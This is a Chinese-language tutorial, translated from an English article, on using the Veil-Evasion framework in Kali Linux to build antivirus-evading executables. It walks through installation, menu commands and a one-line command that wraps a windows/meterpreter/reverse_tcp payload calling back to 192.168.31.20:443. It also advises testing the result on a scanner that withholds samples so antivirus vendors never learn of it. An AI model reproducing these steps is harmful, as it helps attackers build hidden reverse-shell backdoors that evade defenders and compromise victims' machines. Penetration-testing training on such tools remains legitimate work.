原文地址:Evading Antivirus using Veil-Framework in Kali Linux

img

​ Veil由python编写,用来生成免杀的payload。

​ Veil-Evasion是一种生成可执行payload的工具,通过随机创建每个payload来绕过常见的防病毒软件。它的GitHub地址是https://www.github.com/Veil-Framework/Veil-Evasion/,它是Veil项目的一部分https://github.com/Veil-Framework/Veil,我们推荐大多数用户clone和安装。

​ 我们也可以使用metasploit框架的payload及其对x86和x64架构的兼容,并通过命令行或菜单更新 Veil。

​ 可以使用以下命令安装Veil:

#wget -c https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master

#unzip -q master.zip

#cd Veil-Evasion-master/setup

#./setup.sh
img
img
img
img

Veil安装好后,只需要通过以下命令运行:

./Veil-Evasion.py
img

然后切换到Veil-Master目录并启动:./Veil-Evasion.py,Veil的窗口便会出现,你可以看到至今它已经由31个payload了。

可以通过list命令查看所有payload:

img
[>] Please enter a command: list

[>] Please enter a command: use 27
img
[>] Please enter a command: set use_pyherion  Y
img

​ 这个payload包括 PyInjector 风格的payload注入(加密或不加密)和PowerShell注入payload。 PyInjector 创建一个 Python 可执行文件,其中嵌入了ASCII编码的payload,但它使用标准的 Windows API 调用将payload放入内存中并执行它。

​ 这两种方法对于规避杀毒软件都非常有效。我将使用 python/base64_substitution模块。此方法将使用 PyInjector 样式的注入并替换payload。我输入“use 27”,然后按 Enter。它加载该组件,如下所示:

[>] Please enter a command: generate

给出generate命令后,就需要等待shellcode生成了。

现在我们需要选择msfvenom,输入1

[>] Please enter the number of your choice :  1
img

之后我们需要输入一些细节:

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”

Enter value for ‘LPORT’: “443”
img
img

您需要按 Enter 键,然后 Veil 会要求我们提供payload的名称。

我们将使用 Pyinstaller。它将创建一个可执行的 a.exe。为此,我们将输入“1”

[>] Please enter the number of your choice :  1
img

接下来,我执行“generate”命令并按回车键来创建可执行文件。

阅读本文的 Python 程序员肯定会欣赏所生成的源代码。看看这个漂亮的程序乱七八糟的!所有变量名称都是随机的。payload经过加密和编码。

但是,直接从命令行访问会更好,因此您不必使用控制台来生成这些payload。

可以通过运行以下单个命令来生成相同的payload:

#./Veil-Evasion.py -l python -p python/b64_substitution -o trytofindthis –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.31.20 LPORT=443

使用这个命令行风格的界面,您可以绕过 Veil 的菜单系统和脚本。

最后,我们可以在“/root/Veil-master/output/compiled/”得到我们的可执行文件

img
img

Veil的开发人员不想向http://www.virustotal.com提交任何payload,以避免分发给反病毒供应商。

有一个替代用途 vscan.novirusthanks.org。该站点扫描可疑文件以检测恶意软件,并为我们提供以下选项:“不分发样本”。

现在,我们有了我们的可执行文件,我们将把它提交到 vscan.novirusthanks.org。请记得勾选“不要分发样品”。如果您选择不选中此选项或决定将可执行文件提交到http://www.virustotal.com,您的文件将被调查,并且可能会被某些防病毒供应商识别。

img
img
img

您可以在上图中看到任何反病毒供应商都检测到我们的文件为无恶意文件。我们已经检测到接近 1% 的比率!!!!